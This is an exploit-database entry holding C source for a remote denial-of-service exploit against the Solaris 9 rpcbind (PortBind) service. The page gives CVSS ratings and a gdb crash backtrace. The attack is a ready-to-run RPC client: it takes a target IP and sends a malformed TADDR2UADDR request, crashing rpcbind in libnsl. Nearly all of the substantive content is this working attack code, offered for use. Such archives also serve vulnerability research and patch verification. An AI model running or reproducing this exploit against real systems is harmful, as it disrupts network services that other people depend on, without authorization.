Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS Exploit

2008.10.22
Risk: High
Local: No
Remote: Yes
CWE: CWE-noinfo


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* //////////////////////////////////////////////////////////// // Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS //////////////////////////////////////////////////////////// // // Federico L. Bossi Bonin // fbossi[at]globalST[dot]com[dot]ar ///////////////////////////////////////////////////// Program received signal SIGSEGV, Segmentation fault. 0xff29b5f4 in __inet_taddr2uaddr () from /usr/lib/libnsl.so.1 (gdb) backtrace #0 0xff29b5f4 in __inet_taddr2uaddr () from /usr/lib/libnsl.so.1 #1 0x00013d88 in rpcbproc_taddr2uaddr_com () #2 0x000161c0 in rpcb_service_4 () (gdb) */ #include <string.h> #include <rpc/rpc.h> struct xdr { long long_arg; char *string_arg; }; typedef struct xdr xdr; static struct timeval TIMEOUT = { 25, 0 }; bool_t xdr_xdr (XDR *xdrs, xdr *objp) { register int32_t *buf; if (!xdr_long (xdrs, &objp->long_arg)) return FALSE; if (!xdr_string (xdrs, &objp->string_arg, 4096)) return FALSE; return TRUE; } char ** str_4(xdr *argp, CLIENT *clnt) { static char *clnt_res; memset((char *)&clnt_res, 0, sizeof(clnt_res)); if (clnt_call (clnt, 8, (xdrproc_t) xdr_xdr, (caddr_t) argp, (xdrproc_t) xdr_wrapstring, (caddr_t) &clnt_res, TIMEOUT) != RPC_SUCCESS) { return (NULL); } return (&clnt_res); } main(int argc, char *argv[]) { CLIENT *c1; char *server; char **sresult; if (argc !=2){ printf("=============================================================\n"); printf("Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS\n"); printf("-------------------------------------------------------------\n"); printf("Federico L. Bossi Bonin <fbossi@globalST.com.ar>\n"); printf("=============================================================\n\n"); printf("usage: %s <IP>\n",argv[0]); exit(1); } server = argv[1]; if ((c1 = clnt_create(server,100000, 4, "tcp")) == NULL){ clnt_pcreateerror(server); exit(1); } xdr xdrmessage; xdrmessage.long_arg = 0; xdrmessage.string_arg=""; if ((sresult = str_4(&xdrmessage, c1)) == NULL){ clnt_perror(c1, server); exit(1); } clnt_destroy(c1); exit(0); }

References:

http://www.milw0rm.com/exploits/6775


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top